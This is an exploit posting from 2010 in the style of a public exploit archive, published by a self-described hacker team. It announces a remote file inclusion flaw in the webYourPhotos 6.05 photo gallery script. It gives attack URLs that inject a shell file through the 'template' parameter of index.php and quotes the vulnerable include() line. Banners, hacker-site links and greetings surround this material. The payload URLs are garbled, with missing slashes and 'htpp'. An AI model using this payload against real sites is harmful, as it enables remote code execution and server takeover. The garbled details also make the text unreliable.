webYourPhotos <==6.05 (index.php) Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : webYourPhotos <==6.05 (index.php) Remote File Inclusion Vulnerability
# Published : 2010-05-20
# Author : Sn!pEr.S!Te Hacker
# Previous Title : Spaw Editor v1.0 & 2.0 Remote File Upload
# Next Title : Battle Scrypt Shell Upload Vulnerability

__           __      ___ 
 __            __  /'__`        / __  /'__`                  
/_    ___   /_/_L     ___  ,_/ /   _ __       ___    ___     ___ ___           
/  /' _ ` / /_/__<_  /'___  /    /`'__    /'___ / __` /' __` __`    
   / /    / L / __/  _  _   /  __/ __// L / / /    
   _ _ __   ____/ ____\ __\ ____/ _ /_ ____ ____/ _ _ _   
   /_//_//_/ _ /___/  /____/ /__/ /___/  /_/ /_//____//___/  /_//_//_/ 
               ____/                                            
               /___/ 
  
# ----------------------oOO---(_)---OOo----------------------- 
# | __ __ |   
# | _____/ /_____ ______/ /_ __ ______ ______ |   
# | / ___/ __/ __ `/ ___/ __ / / / / __ `/ ___/ |   
# | (__ ) /_/ /_/ / / / /_/ / /_/ / /_/ (__ ) |   
# | /____/__/__,_/_/ /_.___/__,_/__, /____/ |   
# | Security Sn!pEr.S!Te /____/ 2o1o |   
# ------------------------------------------------------------ 
     Remote File Inclusion Vulnerability
# ----------------------------------------------------------- 
---------------------------------------------------------------- 
webYourPhotos <==6.05  ( index.php ) 
  
----------------------------------------------------------------
#[+] Author : Sn!pEr.S!Te Hacker #  
# [+] Email : sniper-site@HoTMaiL.coM #  
# [+] T34M Sn!pEr.S!Te Hacker #  
# [+] 20-5-2010 # 
# [+] Script : Image Galleries ? webYourPhotos 
# [+] Download:http://superphotos.info/webYourPhotos_mysql.zip
# Version: [6.05] #

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=
Exploit : webYourPhotos_mysqlindex.php

http://localhostwebYourPhotos_mysqlindex.php?template=[shell.txt ]

htpp://127.0.0.1webYourPhotos_mysqlindex.php?template=[shell.txt ]

include("templates/template_index_".$template.".php");

line : 311 

web site Favorites my : http://inj3ct0r.com/  & http://www.hack0wn.com/ & http://www.exploit-db.com

================================   Greetz : all my friend   ========================================
 * liar * sm Hacker * baby hacker * Dr.PaL x HaCkEr * saleh Hacker * ALhal alsab |
 * ThE DarK * abo badr * aStoorh alqssim * Ramad Hacker * h-ex |
 * yousfe * HitLer.3rb * QAHER ALRAFDE * DjHacker * My Heart * Mr.koka |